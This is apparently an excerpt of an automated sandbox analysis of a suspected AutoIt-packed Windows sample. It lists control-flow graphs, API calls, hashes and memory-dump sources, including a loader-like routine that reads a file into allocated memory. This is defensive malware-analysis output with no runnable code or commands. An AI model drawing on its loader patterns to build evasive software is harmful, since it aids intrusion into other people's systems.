                                                                                                                                              • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                                              • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1973 40f679-40f67c 1969->1973 1972 40f640 1970->1972 1974 40f642-40f650 1972->1974 1973->1963 1975 40f652-40f655 1974->1975 1976 40f67e-40f68c 1974->1976 1979 40f65b-40f65e 1975->1979 1980 425d1e-425d3e call 4150d1 call 414d04 1975->1980 1977 40f68e-40f68f 1976->1977 1978 40f69f-40f6ad 1976->1978 1977->1975 1982 40f6b4-40f6c2 1978->1982 1983 40f6af-40f6b2 1978->1983 1979->1969 1979->1972 1990 425d43-425d5f call 414d30 1980->1990 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1980 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1974 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1985
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                                                              • String ID: AU3!$EA06
                                                                                                                                              • API String ID: 1268643489-2658333250
                                                                                                                                              • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                              • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                                                              • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                              • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2002 40112c-401141 DefWindowProcW 1997->2002 2000 401184-40118e call 401250 1998->2000 2001 40114c-40114f 1998->2001 1999->1998 2003 401120-401126 1999->2003 2011 401193-40119a 2000->2011 2004 401151-401157 2001->2004 2005 40119d 2001->2005 2003->2002 2007 42b038-42b03f 2003->2007 2008 401219-40121f 2004->2008 2009 40115d 2004->2009 2012 4011a3-4011a9 2005->2012 2013 42afb4-42afc5 call 40f190 2005->2013 2007->2002 2010 42b045-42b059 call 401000 call 40e0c0 2007->2010 2008->2003 2016 401225-42b06d call 468b0e 2008->2016 2014 401163-401166 2009->2014 2015 42b01d-42b024 2009->2015 2010->2002 2012->2003 2019 4011af 2012->2019 2013->2011 2021 42afe9-42b018 call 40f190 call 401a50 2014->2021 2022 40116c-401172 2014->2022 2015->2002 2020 42b02a-42b033 call 4370f4 2015->2020 2016->2011 2019->2003 2026 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2019->2026 2027 4011db-401202 SetTimer RegisterWindowMessageW 2019->2027 2020->2002 2021->2002 2022->2003 2031 401174-42afde call 45fd57 2022->2031 2027->2011 2029 401204-401216 CreatePopupMenu 2027->2029 2031->2002 2045 42afe4 2031->2045 2045->2011
                                                                                                                                              APIs
                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                                              • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                                              • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                              • String ID: TaskbarCreated
                                                                                                                                              • API String ID: 129472671-2362178303
                                                                                                                                              • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                              • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                              • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                              • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                                                                                              APIs
                                                                                                                                              • _malloc.LIBCMT ref: 004115F1
                                                                                                                                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                              • std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                              • std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                              • String ID: ,*H$4*H$@fI
                                                                                                                                              • API String ID: 615853336-1459471987
                                                                                                                                              • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                              • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                                              • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                              • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2065 4039620-40396ce call 4037030 2068 40396d5-40396fb call 403a530 CreateFileW 2065->2068 2071 4039702-4039712 2068->2071 2072 40396fd 2068->2072 2079 4039714 2071->2079 2080 4039719-4039733 VirtualAlloc 2071->2080 2073 403984d-4039851 2072->2073 2074 4039893-4039896 2073->2074 2075 4039853-4039857 2073->2075 2081 4039899-40398a0 2074->2081 2077 4039863-4039867 2075->2077 2078 4039859-403985c 2075->2078 2084 4039877-403987b 2077->2084 2085 4039869-4039873 2077->2085 2078->2077 2079->2073 2086 4039735 2080->2086 2087 403973a-4039751 ReadFile 2080->2087 2082 40398a2-40398ad 2081->2082 2083 40398f5-403990a 2081->2083 2088 40398b1-40398bd 2082->2088 2089 40398af 2082->2089 2090 403991a-4039922 2083->2090 2091 403990c-4039917 VirtualFree 2083->2091 2092 403988b 2084->2092 2093 403987d-4039887 2084->2093 2085->2084 2086->2073 2094 4039753 2087->2094 2095 4039758-4039798 VirtualAlloc 2087->2095 2098 40398d1-40398dd 2088->2098 2099 40398bf-40398cf 2088->2099 2089->2083 2091->2090 2092->2074 2093->2092 2094->2073 2096 403979a 2095->2096 2097 403979f-40397ba call 403a780 2095->2097 2096->2073 2105 40397c5-40397cf 2097->2105 2102 40398ea-40398f0 2098->2102 2103 40398df-40398e8 2098->2103 2101 40398f3 2099->2101 2101->2081 2102->2101 2103->2101 2106 4039802-4039816 call 403a590 2105->2106 2107 40397d1-4039800 call 403a780 2105->2107 2113 403981a-403981e 2106->2113 2114 4039818 2106->2114 2107->2105 2115 4039820-4039824 CloseHandle 2113->2115 2116 403982a-403982e 2113->2116 2114->2073 2115->2116 2117 4039830-403983b VirtualFree 2116->2117 2118 403983e-4039847 2116->2118 2117->2118 2118->2068 2118->2073
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040396F1
                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04039917
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2158942596.0000000004037000.00000040.00000020.00020000.00000000.sdmp, Offset: 04037000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4037000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFileFreeVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 204039940-0
                                                                                                                                              • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                                              • Instruction ID: 06110813a81e794e3000a8a721bf563969eb1910d9f691c2f79aa08ea92e02bc
                                                                                                                                              • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                                              • Instruction Fuzzy Hash: 1FA10AB4E00209EBDB14CFA4C894BEEBBB9FF48305F208559E515BB280D7B5AA41CF55

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2119 401250-40125c 2120 401262-401293 call 412f40 call 401b80 2119->2120 2121 4012e8-4012ed 2119->2121 2126 4012d1-4012e2 KillTimer SetTimer 2120->2126 2127 401295-4012b5 2120->2127 2126->2121 2128 4012bb-4012bf 2127->2128 2129 4272ec-4272f2 2127->2129 2132 4012c5-4012cb 2128->2132 2133 42733f-427346 2128->2133 2130 4272f4-427315 Shell_NotifyIconW 2129->2130 2131 42731a-42733a Shell_NotifyIconW 2129->2131 2130->2126 2131->2126 2132->2126 2136 427393-4273b4 Shell_NotifyIconW 2132->2136 2134 427348-427369 Shell_NotifyIconW 2133->2134 2135 42736e-42738e Shell_NotifyIconW 2133->2135 2134->2126 2135->2126 2136->2126
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                              • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3300667738-0
                                                                                                                                              • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                                              • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                                              • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                                              • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2137 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2140 427190-4271ae RegQueryValueExW 2137->2140 2141 40e4eb-40e4f0 2137->2141 2142 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2140->2142 2143 42721a-42722a RegCloseKey 2140->2143 2148 427210-427219 call 436508 2142->2148 2149 4271f7-42720e call 402160 2142->2149 2148->2143 2149->2148
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                              • API String ID: 1586453840-614718249
                                                                                                                                              • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                                              • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                                              • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                                              • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2154 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                              APIs
                                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$CreateShow
                                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                                              • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                              • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                                              • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                              • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 040392D0: Sleep.KERNELBASE(000001F4), ref: 040392E1
                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04039518
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2158942596.0000000004037000.00000040.00000020.00020000.00000000.sdmp, Offset: 04037000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4037000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFileSleep
                                                                                                                                              • String ID: ESYAY7L4VOZ9AP8
                                                                                                                                              • API String ID: 2694422964-1116421997
                                                                                                                                              • Opcode ID: fbf7eac2040f0cbd79d3e0a1865c11e8836002417465aa8619e3cc9fa5319dce
                                                                                                                                              • Instruction ID: b0816cf8b139191eaef9c16e782c1b9f69fef094913868fc9ae122279f92c2a7
                                                                                                                                              • Opcode Fuzzy Hash: fbf7eac2040f0cbd79d3e0a1865c11e8836002417465aa8619e3cc9fa5319dce
                                                                                                                                              • Instruction Fuzzy Hash: EE517471E14248DBEF11DBE4C854BEEBB79AF54305F004199E209BB2C0D7B91B45CBA5
                                                                                                                                              APIs
                                                                                                                                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                              • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                              • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                                              • String ID: Line:
                                                                                                                                              • API String ID: 1874344091-1585850449
                                                                                                                                              • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                              • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                                              • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                              • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$OpenQueryValue
                                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                                              • API String ID: 1607946009-824357125
                                                                                                                                              • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                              • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                                              • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                              • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                                                              APIs
                                                                                                                                              • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                              • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                              • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                              • _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
